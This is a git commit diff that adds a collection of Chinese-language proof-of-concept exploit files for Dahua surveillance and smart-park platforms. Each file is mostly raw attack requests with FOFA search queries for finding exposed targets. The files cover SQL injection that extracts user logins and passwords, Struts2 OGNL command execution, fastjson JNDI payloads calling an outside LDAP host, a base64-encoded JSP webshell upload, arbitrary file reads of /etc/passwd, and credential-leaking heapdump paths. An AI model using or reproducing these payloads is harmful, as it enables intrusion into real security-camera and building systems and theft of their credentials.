整理文件
This commit is contained in:
wy876
80
大华/大华DSS itcBulletin SQL 注入漏洞.md
Normal file
80
大华/大华DSS itcBulletin SQL 注入漏洞.md
Normal file
@@ -0,0 +1,80 @@
|
||||
## 大华DSS itcBulletin SQL 注入漏洞
|
||||
大华DSS数字监控系统itcBulletin接口存在SQL注入漏洞,攻击者可以利用该漏洞获取数据库敏感信息。
|
||||
|
||||
## fofa
|
||||
```
|
||||
app="dahua-DSS"
|
||||
```
|
||||
|
||||
## poc
|
||||
```
|
||||
POST /portal/services/itcBulletin?wsdl HTTP/1.1
|
||||
Host: x.x.x.x
|
||||
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
|
||||
Connection: close
|
||||
Content-Length: 345
|
||||
Accept-Encoding: gzip
|
||||
|
||||
<s11:Envelope xmlns:s11='http://schemas.xmlsoap.org/soap/envelope/'>
|
||||
<s11:Body>
|
||||
<ns1:deleteBulletin xmlns:ns1='http://itcbulletinservice.webservice.dssc.dahua.com'>
|
||||
<netMarkings>
|
||||
(updatexml(1,concat(0x7e,md5(102103122),0x7e),1))) and (1=1
|
||||
</netMarkings>
|
||||
</ns1:deleteBulletin>
|
||||
</s11:Body>
|
||||
</s11:Envelope>
|
||||
|
||||
|
||||
POST /portal/services/itcBulletin?wsdl HTTP/1.1
|
||||
Host: your-ip
|
||||
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
|
||||
Accept-Encoding: gzip
|
||||
|
||||
<s11:Envelope xmlns:s11='http://schemas.xmlsoap.org/soap/envelope/'>
|
||||
<s11:Body>
|
||||
<ns1:deleteBulletin xmlns:ns1='http://itcbulletinservice.webservice.dssc.dahua.com'>
|
||||
<netMarkings>
|
||||
(updatexml(1,concat(0x7e,(select substr(group_concat(login_name, " ",login_pass),1,30) from sys_user),0x7e),1))) and (1=1
|
||||
</netMarkings>
|
||||
</ns1:deleteBulletin>
|
||||
</s11:Body>
|
||||
</s11:Envelope>
|
||||
|
||||
```
|
||||
|
||||
## nuclei poc
|
||||
```
|
||||
id: dahua-dss-itcBulletin-sqli
|
||||
info:
|
||||
name: 大华DSS itcBulletin SQL注入漏洞
|
||||
author: fgz
|
||||
severity: high
|
||||
description: 大华DSS数字监控系统itcBulletin接口存在SQL注入漏洞,攻击者可以利用该漏洞获取数据库敏感信息。
|
||||
metadata:
|
||||
fofa-query: app="dahua-DSS"
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |+
|
||||
POST /portal/services/itcBulletin?wsdl HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Accept-Encoding: gzip
|
||||
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
|
||||
|
||||
<s11:Envelope xmlns:s11='http://schemas.xmlsoap.org/soap/envelope/'>
|
||||
<s11:Body>
|
||||
<ns1:deleteBulletin xmlns:ns1='http://itcbulletinservice.webservice.dssc.dahua.com'>
|
||||
<netMarkings>
|
||||
(updatexml(1,concat(0x7e,md5(102103122),0x7e),1))) and (1=1
|
||||
</netMarkings>
|
||||
</ns1:deleteBulletin>
|
||||
</s11:Body>
|
||||
</s11:Envelope>
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: dsl
|
||||
dsl:
|
||||
- 'status_code==500 && contains(body,"error code [1105]") && contains(body,"6cfe798ba8e5b85feb50164c59f4bec")'
|
||||
```
|
||||
21
大华/大华DSS城市安防监控平台Struct2-045命令执行漏洞.md
Normal file
21
大华/大华DSS城市安防监控平台Struct2-045命令执行漏洞.md
Normal file
@@ -0,0 +1,21 @@
|
||||
## 大华DSS城市安防监控平台Struct2-045命令执行漏洞
|
||||
|
||||
|
||||
## fofa
|
||||
```
|
||||
app="dahua-DSS"
|
||||
```
|
||||
|
||||
## poc
|
||||
```
|
||||
POST /admin/login_login.action HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F
|
||||
Content-Length: 0
|
||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
|
||||
Accept-Encoding: gzip, deflate, br
|
||||
Connection: close
|
||||
Content-Type: %{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='whoami').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}
|
||||
```
|
||||
|
||||
|
||||
26
大华/大华DSS城市安防监控平台login_init.action接口存在Struct2-045命令执行漏洞.md
Normal file
26
大华/大华DSS城市安防监控平台login_init.action接口存在Struct2-045命令执行漏洞.md
Normal file
@@ -0,0 +1,26 @@
|
||||
## 大华DSS城市安防监控平台login_init.action接口存在Struct2-045命令执行漏洞
|
||||
|
||||
大华DSS安防监控系统平台采用Apache Struts2作为网站应用框架。/portal/login_init.action接口存在远程命令执行漏洞,攻击者可以通过在上传文件时修改HTTP请求标头中的Content Type值来触发该漏洞,然后执行该漏洞。系统命令以获取服务器权限。
|
||||
|
||||
## fofa
|
||||
|
||||
```
|
||||
app="dahua-DSS"
|
||||
```
|
||||
|
||||
## poc
|
||||
|
||||
```
|
||||
POST /portal/login_init.action HTTP/1.1
|
||||
Host:
|
||||
Connection: close
|
||||
Content-Type: %{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='whoami').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}
|
||||
Cache-Control: no-cache
|
||||
Pragma: no-cache
|
||||
User-Agent: Java/1.8.0_333
|
||||
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
|
||||
Content-Length: 0
|
||||
|
||||
```
|
||||
|
||||
|
||||
@@ -0,0 +1,25 @@
|
||||
## 大华DSS城市安防监控平台user_toLoginPage.action接口存在Struct2-045命令执行漏洞
|
||||
|
||||
大华DSS安防监控系统平台采用Apache Struts2作为网站应用框架。/config/user_toLoginPage.action接口存在远程命令执行漏洞,攻击者可以通过在上传文件时修改HTTP请求标头中的Content Type值来触发该漏洞,然后执行该漏洞。系统命令以获取服务器权限。
|
||||
|
||||
## fofa
|
||||
|
||||
```
|
||||
app="dahua-DSS"
|
||||
```
|
||||
|
||||
## poc
|
||||
|
||||
```
|
||||
POST /config/user_toLoginPage.action HTTP/1.1
|
||||
Host:
|
||||
Connection: close
|
||||
Content-Type: %{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='whoami').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}
|
||||
Cache-Control: no-cache
|
||||
Pragma: no-cache
|
||||
User-Agent: Java/1.8.0_333
|
||||
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
|
||||
Content-Length: 0
|
||||
```
|
||||
|
||||
|
||||
@@ -0,0 +1,7 @@
|
||||
## 大华DSS数字监控系统attachment_clearTempFile.action存在SQL注入漏洞
|
||||
|
||||
|
||||
## poc
|
||||
```
|
||||
http://ip/portal/attachment_clearTempFile.action?bean.RecId=1*&bean.TabName=1
|
||||
```
|
||||
24
大华/大华DSS系统group_saveGroup存在SQL注入漏洞.md
Normal file
24
大华/大华DSS系统group_saveGroup存在SQL注入漏洞.md
Normal file
@@ -0,0 +1,24 @@
|
||||
# 大华DSS系统group_saveGroup存在SQL注入漏洞
|
||||
|
||||
|
||||
|
||||
## fofa
|
||||
|
||||
```yaml
|
||||
app="dahua-DSS"
|
||||
```
|
||||
|
||||
## poc
|
||||
|
||||
```javascript
|
||||
GET /emap/group_saveGroup?groupName=1'%20and%202333=2333%20and%20'hami'='hami&groupDesc=1 HTTP/1.1
|
||||
Host: xx.xx.xx.xx
|
||||
Accept-Encoding: identity
|
||||
Accept-Language: zh-CN,zh;q=0.8
|
||||
Accept: */*
|
||||
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info
|
||||
Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
|
||||
Connection: keep-alive
|
||||
Cache-Control: max-age=0
|
||||
```
|
||||
|
||||
27
大华/大华EIMS-capture_handle接口远程命令执行漏洞.md
Normal file
27
大华/大华EIMS-capture_handle接口远程命令执行漏洞.md
Normal file
@@ -0,0 +1,27 @@
|
||||
## 大华EIMS-capture_handle接口远程命令执行漏洞
|
||||
|
||||
## Zoomeye
|
||||
```
|
||||
app:"大华 EIMS"
|
||||
```
|
||||
|
||||
## fofa
|
||||
```
|
||||
"<title>eims</title>"
|
||||
```
|
||||
|
||||
|
||||
## poc
|
||||
```
|
||||
GET /config/asst/system_setPassWordValidate.action/capture_handle.action?captureFlag=true&captureCommand=ping%20xxx.dnslog.cn%20index.pcap HTTP/1.1
|
||||
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0
|
||||
Accept-Encoding: gzip, deflate, br
|
||||
Accept: */*
|
||||
Connection: close
|
||||
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
|
||||
Host: :9080
|
||||
```
|
||||
|
||||
|
||||
|
||||
|
||||
20
大华/大华ICC智能物联综合管理平台heapdump敏感信息泄露.md
Normal file
20
大华/大华ICC智能物联综合管理平台heapdump敏感信息泄露.md
Normal file
@@ -0,0 +1,20 @@
|
||||
# 大华ICC智能物联综合管理平台heapdump敏感信息泄露
|
||||
|
||||
大华ICC智能物联综合管理平台heapdump文件敏感信息泄露,可以获取账号和密码。
|
||||
|
||||
## fofa
|
||||
|
||||
```
|
||||
body="static/fontshd/font-hd.css" || body="客户端会小于800"
|
||||
```
|
||||
|
||||
## poc
|
||||
|
||||
```
|
||||
/evo-apigw/dsc-mac/heapdump;.js
|
||||
/evo-apigw/dsc-mac/env;.js
|
||||
```
|
||||
|
||||
|
||||
|
||||
|
||||
33
大华/大华ICC智能物联综合管理平台存在fastjson漏洞.md
Normal file
33
大华/大华ICC智能物联综合管理平台存在fastjson漏洞.md
Normal file
@@ -0,0 +1,33 @@
|
||||
## 大华ICC智能物联综合管理平台存在fastjson漏洞
|
||||
|
||||
大华ICC智能物联综合管理平台是专门为大华股份研发的一款物联网管理平台,它可以对多个智能设备和系统进行统一管理和控制,方便用户实时了解和管理各个设备和系统的状态。该平台提供了一系列的智能化功能,包括设备管理、监控预警、数据分析等,旨在为用户提供更加智能、高效和便捷的物联网管理体验,其使用了alibaba fastjson,存在反序列化漏洞导致RCE。
|
||||
|
||||
## fofa
|
||||
```
|
||||
body="*客户端会小于800*"
|
||||
```
|
||||
|
||||
## poc
|
||||
```
|
||||
POST /evo-runs/v1.0/auths/sysusers/random HTTP/2
|
||||
Host: 127.0.0.1
|
||||
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/113.0
|
||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
|
||||
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
|
||||
Accept-Encoding: gzip, deflate
|
||||
Upgrade-Insecure-Requests: 1
|
||||
Sec-Fetch-Dest: document
|
||||
Sec-Fetch-Mode: navigate
|
||||
Sec-Fetch-Site: none
|
||||
Sec-Fetch-User: ?1
|
||||
Te: trailers
|
||||
Content-Type: application/json
|
||||
Content-Length: 144
|
||||
|
||||
{
|
||||
"a":{
|
||||
"@type":"com.alibaba.fastjson.JSONObject",
|
||||
{"@type":"java.net.URL","val":"http://dnslog.cn"}
|
||||
}""
|
||||
}
|
||||
```
|
||||
26
大华/大华城市安防监控系统平台管理存在user_edit.action信息泄露漏洞.md
Normal file
26
大华/大华城市安防监控系统平台管理存在user_edit.action信息泄露漏洞.md
Normal file
@@ -0,0 +1,26 @@
|
||||
## 大华城市安防监控系统平台管理存在user_edit.action信息泄露漏洞
|
||||
|
||||
大华DSS城市安防监控平台是一个在通用安防视频监控系统基础上设计开发的系统。该平台user_edit.action泄露了敏感信息漏洞,攻击者可以通过此漏洞获取管理员对应权限。
|
||||
|
||||
## fofa
|
||||
|
||||
```
|
||||
app="dahua-DSS"
|
||||
```
|
||||
|
||||
## poc
|
||||
|
||||
```
|
||||
GET /admin/cascade_/user_edit.action?id=1 HTTP/1.1
|
||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
|
||||
Accept-Encoding: gzip, deflate
|
||||
Accept-Language: zh-CN,zh;q=0.9
|
||||
Cache-Control: max-age=0
|
||||
Connection: keep-alive
|
||||
Cookie: JSESSIONID=62BBD37D6AD7942778952E5ECE63494B; JSESSIONID=07A0062125A8903E4C6158A0244BABCD
|
||||
Host:
|
||||
Upgrade-Insecure-Requests: 1
|
||||
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
|
||||
```
|
||||
|
||||
|
||||
22
大华/大华智慧园区clientServer接口SQL注入漏洞.md
Normal file
22
大华/大华智慧园区clientServer接口SQL注入漏洞.md
Normal file
@@ -0,0 +1,22 @@
|
||||
## 大华智慧园区clientServer接口SQL注入漏洞
|
||||
|
||||
|
||||
## poc
|
||||
```
|
||||
POST /portal/services/clientServer HTTP/1.1
|
||||
Host:xxx
|
||||
User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
|
||||
Content-Type: text/xml;charset=UTF-8
|
||||
|
||||
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:cli="http://clientServer.webservice.dssc.dahua.com">
|
||||
<soapenv:Header/>
|
||||
<soapenv:Body>
|
||||
<cli:getGroupInfoListByGroupId>
|
||||
<!--type: string-->
|
||||
<arg0>-5398) UNION ALL SELECT 5336,5336,5336,5336,md5(123456)-- -</arg0>
|
||||
<!--type: long-->
|
||||
<arg1>10</arg1>
|
||||
</cli:getGroupInfoListByGroupId>
|
||||
</soapenv:Body>
|
||||
</soap:Envelope>
|
||||
```
|
||||
26
大华/大华智慧园区getNewStaypointDetailQuery接口SQL注入漏洞.md
Normal file
26
大华/大华智慧园区getNewStaypointDetailQuery接口SQL注入漏洞.md
Normal file
@@ -0,0 +1,26 @@
|
||||
## 大华智慧园区getNewStaypointDetailQuery接口SQL注入漏洞
|
||||
|
||||
|
||||
|
||||
## poc
|
||||
```
|
||||
POST /portal/services/carQuery/getNewStaypointDetailQuery HTTP/1.1
|
||||
Host:xxx
|
||||
User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
|
||||
Content-Type: text/xml;charset=UTF-8
|
||||
Content-Length: 491
|
||||
|
||||
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:car="http://carQuery.webservice.dssc.dahua.com">
|
||||
<soapenv:Header/>
|
||||
<soapenv:Body>
|
||||
<car:getNewStaypointDetailQuery>
|
||||
<!--type: string-->
|
||||
<searchJson>{}</searchJson>
|
||||
<!--type: string-->
|
||||
<pageJson>{"orderBy":"1 and 1=updatexml(1,concat(0x7e,md5(123456),0x7e),1)--"}</pageJson>
|
||||
<!--type: string-->
|
||||
<extend>quae divum incedo</extend>
|
||||
</car:getNewStaypointDetailQuery>
|
||||
</soapenv:Body>
|
||||
</soapenv:Envelope>
|
||||
```
|
||||
20
大华/大华智慧园区管理平台任意文件读取.md
Normal file
20
大华/大华智慧园区管理平台任意文件读取.md
Normal file
@@ -0,0 +1,20 @@
|
||||
|
||||
## 大华智慧园区管理平台任意文件读取
|
||||
|
||||
大华 城市安防监控系统平台管理 任意文件下载漏洞
|
||||
|
||||
|
||||
|
||||
## poc
|
||||
```
|
||||
GET /portal/attachment_downloadByUrlAtt.action?filePath=file:///etc/passwd HTTP/1.1
|
||||
Host: ip:port
|
||||
Upgrade-Insecure-Requests: 1
|
||||
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.93 Safari/537.36
|
||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
|
||||
Accept-Encoding: gzip, deflate
|
||||
Accept-Language: zh-CN,zh;q=0.9
|
||||
Connection: close
|
||||
```
|
||||
|
||||
|
||||
23
大华/大华智慧园区综合管理平台 deleteFtp 远程命令执行漏洞.md
Normal file
23
大华/大华智慧园区综合管理平台 deleteFtp 远程命令执行漏洞.md
Normal file
@@ -0,0 +1,23 @@
|
||||
## 大华智慧园区综合管理平台 deleteFtp 远程命令执行漏洞
|
||||
|
||||
## fofa
|
||||
```
|
||||
body="src=/WPMS/asset/common/js/jsencrypt.min.js"
|
||||
```
|
||||
|
||||
## poc
|
||||
```
|
||||
POST /CardSolution/card/accessControl/swingCardRecord/deleteFtp HTTP/1.1
|
||||
Host: Cache-Control: max-age=0
|
||||
Upgrade-Insecure-Requests: 1
|
||||
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.111 Safari/537.36
|
||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
|
||||
Accept-Encoding: gzip, deflate, br
|
||||
Accept-Language: zh-CN,zh;q=0.9Cookie: yourCookieConnection: close
|
||||
Content-Type: application/json
|
||||
Content-Length: 189
|
||||
|
||||
{"ftpUrl":{"e":{"@type":"java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl"},"f":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://x.x.x.x","autoCommit":true}}}
|
||||
```
|
||||
|
||||
`ldap://x.x.x.x` 填入dnslog地址 ,发送poc dnslog有请求说明存在漏洞
|
||||
8
大华/大华智慧园区综合管理平台 searchJson SQL注入漏洞.md
Normal file
8
大华/大华智慧园区综合管理平台 searchJson SQL注入漏洞.md
Normal file
@@ -0,0 +1,8 @@
|
||||
## 大华智慧园区综合管理平台 searchJson SQL注入漏洞
|
||||
```
|
||||
GET /portal/services/carQuery/getFaceCapture/searchJson/%7B%7D/pageJson/%7B%22orderBy%22:%221%20and%201=updatexml(1,concat(0x7e,(select%20md5(388609)),0x7e),1)--%22%7D/extend/%7B%7D HTTP/1.1
|
||||
Host: 127.0.0.1:7443
|
||||
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
|
||||
Accept-Encoding: gzip, deflate
|
||||
Connection: close
|
||||
```
|
||||
24
大华/大华智慧园区综合管理平台 文件上传漏洞.md
Normal file
24
大华/大华智慧园区综合管理平台 文件上传漏洞.md
Normal file
@@ -0,0 +1,24 @@
|
||||
## 大华智慧园区综合管理平台 文件上传漏洞
|
||||
```
|
||||
POST /publishing/publishing/material/file/video HTTP/1.1
|
||||
Host: 127.0.0.1:7443
|
||||
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
|
||||
Content-Length: 804
|
||||
Content-Type: multipart/form-data; boundary=dd8f988919484abab3816881c55272a7
|
||||
Accept-Encoding: gzip, deflate
|
||||
Connection: close
|
||||
|
||||
--dd8f988919484abab3816881c55272a7
|
||||
Content-Disposition: form-data; name="Filedata"; filename="0EaE10E7dF5F10C2.jsp"
|
||||
|
||||
<%@page contentType="text/html; charset=GBK"%><%@page import="java.math.BigInteger"%><%@page import="java.security.MessageDigest"%><% MessageDigest md5 = null;md5 = MessageDigest.getInstance("MD5");String s = "123456";String miyao = "";String jiamichuan = s + miyao;md5.update(jiamichuan.getBytes());String md5String = new BigInteger(1, md5.digest()).toString(16);out.println(md5String);new java.io.File(application.getRealPath(request.getServletPath())).delete();%>
|
||||
--dd8f988919484abab3816881c55272a7
|
||||
Content-Disposition: form-data; name="poc"
|
||||
|
||||
poc
|
||||
--dd8f988919484abab3816881c55272a7
|
||||
Content-Disposition: form-data; name="Submit"
|
||||
|
||||
submit
|
||||
--dd8f988919484abab3816881c55272a7--
|
||||
```
|
||||
35
大华/大华智慧园区综合管理平台bitmap接口存在任意文件上传漏洞.md
Normal file
35
大华/大华智慧园区综合管理平台bitmap接口存在任意文件上传漏洞.md
Normal file
@@ -0,0 +1,35 @@
|
||||
## 大华智慧园区综合管理平台bitmap接口存在任意文件上传漏洞
|
||||
|
||||
大华园区综合管理平台/emap/webservice/gis/soap/bitmap接口处存在任意文件上传漏洞,恶意攻击者可能会上传后门文件,造成服务器失陷
|
||||
|
||||
|
||||
## fofa
|
||||
```
|
||||
app="dahua-智慧园区综合管理平台"
|
||||
```
|
||||
|
||||
|
||||
|
||||
## poc
|
||||
```
|
||||
POST /emap/webservice/gis/soap/bitmap HTTP/1.1
|
||||
Host: your-ip
|
||||
Content-Type: text/xml; charset=utf-8
|
||||
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
|
||||
|
||||
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:res="http://response.webservice.bitmap.mapbiz.emap.dahuatech.com/">
|
||||
<soapenv:Header/>
|
||||
<soapenv:Body>
|
||||
<res:uploadPicFile>
|
||||
<arg0>
|
||||
<picPath>/../rce.jsp</picPath>
|
||||
</arg0>
|
||||
<arg1>PCUgaWYoIjEyMyIuZXF1YWxzKHJlcXVlc3QuZ2V0UGFyYW1ldGVyKCJwd2QiKSkpeyBqYXZhLmlvLklucHV0U3RyZWFtIGluID0gUnVudGltZS5nZXRSdW50aW1lKCkuZXhlYyhyZXF1ZXN0LmdldFBhcmFtZXRlcigiY21kIikpLmdldElucHV0U3RyZWFtKCk7IGludCBhID0gLTE7IGJ5dGVbXSBiID0gbmV3IGJ5dGVbMjA0OF07IG91dC5wcmludCgiPHByZT4iKTsgd2hpbGUoKGE9aW4ucmVhZChiKSkhPS0xKXsgb3V0LnByaW50bG4obmV3IFN0cmluZyhiKSk7IH0gb3V0LnByaW50KCI8L3ByZT4iKTsgfSAlPg==</arg1>
|
||||
</res:uploadPicFile>
|
||||
</soapenv:Body>
|
||||
</soapenv:Envelope>
|
||||
```
|
||||
文件上传路径:http://127.0.0.1/upload/rce.jsp
|
||||
|
||||
|
||||
|
||||
21
大华/大华智慧园区综合管理平台ipms接口存在远程代码执行漏洞.md
Normal file
21
大华/大华智慧园区综合管理平台ipms接口存在远程代码执行漏洞.md
Normal file
@@ -0,0 +1,21 @@
|
||||
## 大华智慧园区综合管理平台ipms接口存在远程代码执行漏洞
|
||||
|
||||
大华智慧园区综合管理平台/ipms/barpay/pay存在远程代码执行漏洞,允许未经授权的攻击者执行系统命令。
|
||||
|
||||
## fofa
|
||||
```
|
||||
body="src=/WPMS/asset/common/js/jsencrypt.min.js"
|
||||
```
|
||||
|
||||
## poc
|
||||
```
|
||||
POST /ipms/barpay/pay HTTP/1.1
|
||||
Host: {host}
|
||||
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
|
||||
Cmd: whoami
|
||||
Content-Type: application/json
|
||||
Accept-Encoding: gzip
|
||||
Content-Length: 104
|
||||
|
||||
{"@type": "com.sun.rowset.JdbcRowSetImpl", "dataSourceName": "ldap://gobygo.net/A4", "autoCommit": true}
|
||||
```
|
||||
16
大华/大华智慧园区综合管理平台pageJson存在SQL注入漏洞.md
Normal file
16
大华/大华智慧园区综合管理平台pageJson存在SQL注入漏洞.md
Normal file
@@ -0,0 +1,16 @@
|
||||
## 大华智慧园区综合管理平台pageJson存在SQL注入漏洞
|
||||
|
||||
|
||||
## fofa
|
||||
```
|
||||
app="dahua-智慧园区综合管理平台"
|
||||
```
|
||||
|
||||
## poc
|
||||
```
|
||||
GET /portal/services/carQuery/getFaceCapture/searchJson/%7B%7D/pageJson/%7B%22orderBy%22:%221%20and%201=updatexml(1,concat(0x7e,(select%20md5(1)),0x7e),1)--%22%7D/extend/%7B%7D HTTP/1.1
|
||||
Host: 127.0.0.1
|
||||
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
|
||||
Accept: */*
|
||||
Connection: Keep-Alive
|
||||
```
|
||||
@@ -0,0 +1,21 @@
|
||||
## 大华智慧园区综合管理平台user_getUserInfoByUserName.action未授权任意用户密码读取
|
||||
|
||||
大华智慧园区综合管理平台是一款综合管理平台,具备园区运营、资源调 配和智能服务等功能。平台意在协助优化园区资源分配,满足多元化的管 理需求,同时通过提供智能服务,增强使用体验。
|
||||
|
||||
由于该平台未对接口权限做限制,攻击者可以从 user_getUserInfoByUserName.action 接口获取任意用户密码(MD5 格式)。
|
||||
|
||||
## fofa
|
||||
|
||||
```
|
||||
body="src=/WPMS/asset/common/js/jsencrypt.min.js"
|
||||
```
|
||||
|
||||
## poc
|
||||
|
||||
```
|
||||
GET /admin/user_getUserInfoByUserName.action?userName=system HTTP/1.1
|
||||
Host: xxxxxxxxx
|
||||
Cookie: JSESSIONID=D99F6DAEA7EC0695266E95A1B1A529CC
|
||||
```
|
||||
|
||||
|
||||
27
大华/大华智能物联ICC综合管理平台readpic任意文件读取漏洞.md
Normal file
27
大华/大华智能物联ICC综合管理平台readpic任意文件读取漏洞.md
Normal file
@@ -0,0 +1,27 @@
|
||||
|
||||
## 大华智能物联ICC综合管理平台readpic任意文件读取漏洞
|
||||
大华智慧园区综合管理平台是一款综合管理平台,具备园区运营、资源调配和智能服务等功能。该平台的 "readpic" 接口存在一个任意文件读取漏洞,恶意攻击者可通过文件读取漏洞进行访问和读取系统中的文件,包括配置文件、日志和其他敏感数据,从而利用攻击。
|
||||
|
||||
## fofa
|
||||
```
|
||||
:body="*客户端会小于800*"
|
||||
```
|
||||
|
||||
## poc
|
||||
```
|
||||
GET /evo-apigw/evo-cirs/file/readPic?fileUrl=file:/etc/passwd HTTP/2
|
||||
Host: 127.0.0.1
|
||||
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0
|
||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
|
||||
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
|
||||
Accept-Encoding: gzip, deflate
|
||||
Upgrade-Insecure-Requests: 1
|
||||
Sec-Fetch-Dest: document
|
||||
Sec-Fetch-Mode: navigate
|
||||
Sec-Fetch-Site: none
|
||||
Sec-Fetch-User: ?1
|
||||
If-None-Match: W/"63ba2750-93e"
|
||||
Te: trailers
|
||||
```
|
||||
|
||||
|
||||
23
大华/大华智能物联综合管理平台justForTest用户登录漏洞.md
Normal file
23
大华/大华智能物联综合管理平台justForTest用户登录漏洞.md
